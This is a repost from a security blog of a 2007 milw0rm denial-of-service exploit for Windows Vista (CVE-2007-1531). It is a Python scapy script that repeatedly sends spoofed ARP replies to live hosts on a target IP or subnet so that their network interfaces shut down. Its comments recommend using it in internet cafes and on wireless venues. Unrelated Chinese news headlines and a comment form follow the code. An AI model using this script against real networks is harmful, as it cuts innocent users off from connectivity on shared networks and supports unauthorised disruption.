#!/usr/bin/env python
#
# :: Kristian Hermansen ::
# Date: 20070514
# Reference: CVE-2007-1531
# Description: Mcft Windows Vista (SP0) dumps interfaces when
# it receives this ARP packet.  This DoS is useful for an internet
# cafe, wireless venue, or legitimate local attack.  The victim will
# need to manually refresh their network interface.  OK, sure
# it's a dumb local attack, but why does Vista disable iface!?!??
# -> Thanks to Newsham / Hoagland
# Vulnerable: Mcft Windows Vista (SP0) [All Versions]
# Tested:
# * victim == Windows Vista Enterprise (SP0) [English]
# * attacker == Ubuntu Feisty (7.04)
# Usage: python fISTArp.py
# Depends: scapy.py
# [?] If you don't have scapy
# [+] wget //hg.secdev.org/scapy/raw-file/tip/scapy.py

from sys import argv
from os import geteuid
from scapy import Ether,ARP,send,srp,conf
from time import sleep

conf.verb = 0

def head():
   print """
                      __ ___ ____ _____  _                
                     / _|_ _/ ___|_   _|/ \   _ __ _ __  
                    | |_ | |\___ \ | | / _ \ | '__| '_ \
                    |  _|| | ___) || |/ ___ \| |  | |_) |
                    |_| |___|____/ |_/_/   \_\_|  | .__/
                                                  |_|    

   """

def isroot():
   if geteuid() != 0:
       print "TRY AGAIN AS ROOT SILLY..."
       return False
   else:
       return True

def usage():
   print "usage:", argv[0], ""
   print "examples:", argv[0], "192.168.1.100"
   print "examples:", argv[0], "192.168.1.0/24\n"

def fisting():
   arp_fist = ARP(pdst=argv[1],op=2)
   print "We are going to loop forever, CTRL-C to stop...\n"
   while True:
       sleep(3)
       for a in arp_fist:
           arping = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=a.pdst)
           ans,unans = srp(arping,timeout=0.1)
           if len(ans) == 1:
               a.psrc=a.pdst
               print a.pdst, "is ALIVE!"
               print "* Time to shut it down!"
               send(a)
               ans2,unans2 = srp(arping,timeout=0.1)
               if len(unans2) == 1:
                   print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                   print "@@@", a.psrc, "was rubber fisted!"
                   print "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
                   sleep(3)
               else:
                   print "FAILED:", a.pdst, "is still alive :-("
           else:
               print a.pdst, "is already DEAD!"
           print

head()
if isroot() != True:
   exit(1)
if len(argv) != 2:
   usage()
   exit(1)
else:
   fisting()

# u.b.u.n.t.u n.e.t.s.n.i.p.e.r t.h.c.t.e.st.

# milw0rm.com [2007-05-15]
Tags: ,
Bug&Exp | Comments(0) | Trackbacks(0) | Reads(9433)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive
 
  • 银行理财收益连续两周上涨 互联网宝宝跌破4% 2018-12-08
  • 恒动我“芯”—— HUAWEI WATCH尊赏沙龙即将亮相兰境艺术中心 2018-12-08
  • 【中国梦·践行者】亲身经历“失联”的等待 21岁CEO为留学生做“安保” 2018-12-07
  • 《四部医典》入选《世界记忆亚太地区名录》 2018-12-07
  • 抚州市12名处级干部正式任职 2018-07-26
  • 压倒性态势是如何形成的——党的十八大以来反腐倡廉工作综述 2018-07-25
  • 安徽一副县级干部严重违纪违法被“双开” 2018-07-25
  • 美最新研究:抑郁会引发记忆问题 2018-07-25
  • 《邪不压正》彭于晏廖凡合作姜文受益良多 2018-07-24
  • (Dos sesiones) El pueblo es el creador de la historia y el verdadero héroe, dice presidente chino Spanish.xinhuanet.com 2018-07-24
  • 《新时代·新征程十九大精神在基层》各地聚焦--甘肃频道--人民网 2018-07-24
  • 【一周"纪"录】"狐狸"外逃,海外群众也不会放过他们 2018-07-23
  • 航运大数据时代到来,订舱就像买机票? 2018-07-23
  • 山西省重要党务政务信息新闻发布会——黄河新闻网 2018-07-23
  • 地市链接--山西频道--人民网 2018-07-22
  • 181| 141| 339| 94| 480| 739| 514| 387| 11| 205|